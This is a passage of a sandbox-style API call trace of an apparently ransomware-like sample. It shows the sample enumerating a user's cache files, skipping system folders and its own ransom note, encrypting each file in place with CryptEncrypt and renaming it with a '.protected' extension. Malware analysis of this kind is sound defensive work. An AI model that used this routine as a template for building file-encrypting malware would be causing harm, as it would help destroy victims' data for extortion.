nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.052] CloseHandle (hObject=0x150) returned 1 [0089.052] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.protected") returned 162 [0089.052] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed.protected")) returned 1 [0089.053] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.053] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="Windows") returned -1 [0089.053] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="Program Files") returned -1 [0089.053] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="Program Files (x86)") returned -1 [0089.053] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="$Recycle.bin") returned 1 [0089.053] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="System Volume Information") returned -1 [0089.053] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 152 [0089.053] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".protected") returned 0x0 [0089.053] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpString2="RESTORE_FILES.txt") returned -1 [0089.053] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.053] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 152 [0089.054] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".txt") returned 0x0 [0089.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 152 [0089.054] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".rar") returned 0x0 [0089.054] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 152 [0089.054] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".zip") returned 0x0 [0089.054] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.054] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.054] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.054] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.055] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.055] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.055] CloseHandle (hObject=0x150) returned 1 [0089.055] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.protected") returned 162 [0089.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e.protected")) returned 1 [0089.055] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.055] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="Windows") returned -1 [0089.055] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="Program Files") returned -1 [0089.056] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="Program Files (x86)") returned -1 [0089.056] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="$Recycle.bin") returned 1 [0089.056] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="System Volume Information") returned -1 [0089.056] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 152 [0089.056] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".protected") returned 0x0 [0089.056] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpString2="RESTORE_FILES.txt") returned -1 [0089.056] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.056] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.056] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 152 [0089.056] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".txt") returned 0x0 [0089.056] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 152 [0089.056] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".rar") returned 0x0 [0089.056] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 152 [0089.056] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".zip") returned 0x0 [0089.056] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.057] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.057] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x182, lpOverlapped=0x0) returned 1 [0089.057] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.057] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.057] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.057] CloseHandle (hObject=0x150) returned 1 [0089.057] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.protected") returned 162 [0089.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30.protected")) returned 1 [0089.059] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.059] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="Windows") returned -1 [0089.059] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="Program Files") returned -1 [0089.059] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="Program Files (x86)") returned -1 [0089.059] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="$Recycle.bin") returned 1 [0089.059] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="System Volume Information") returned -1 [0089.059] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 152 [0089.059] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".protected") returned 0x0 [0089.059] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpString2="RESTORE_FILES.txt") returned -1 [0089.059] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.059] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 152 [0089.060] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".txt") returned 0x0 [0089.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 152 [0089.060] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".rar") returned 0x0 [0089.060] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned 152 [0089.060] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", lpSrch=".zip") returned 0x0 [0089.060] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.061] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.061] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x186, lpOverlapped=0x0) returned 1 [0089.061] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.061] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.061] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.061] CloseHandle (hObject=0x150) returned 1 [0089.061] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.protected") returned 162 [0089.061] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb.protected")) returned 1 [0089.062] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.062] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="Windows") returned -1 [0089.062] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="Program Files") returned -1 [0089.062] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="Program Files (x86)") returned -1 [0089.062] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="$Recycle.bin") returned 1 [0089.062] lstrcmpiW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="System Volume Information") returned -1 [0089.062] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 152 [0089.062] StrStrIW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".protected") returned 0x0 [0089.062] lstrcmpW (lpString1="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpString2="RESTORE_FILES.txt") returned -1 [0089.062] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.062] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.062] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 152 [0089.063] StrStrW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".txt") returned 0x0 [0089.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 152 [0089.063] StrStrW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".rar") returned 0x0 [0089.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned 152 [0089.063] StrStrW (lpFirst="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", lpSrch=".zip") returned 0x0 [0089.063] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x180, lpOverlapped=0x0) returned 1 [0089.064] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.064] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x180, lpOverlapped=0x0) returned 1 [0089.064] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.064] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.064] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.064] CloseHandle (hObject=0x150) returned 1 [0089.064] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.protected") returned 162 [0089.064] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\828298824ea5549947c17ddabf6871f5_0206efbc540300c3bf0163cdbc3d7d56.protected")) returned 1 [0089.065] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.065] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpString2="Windows") returned -1 [0089.065] lstrcmpiW 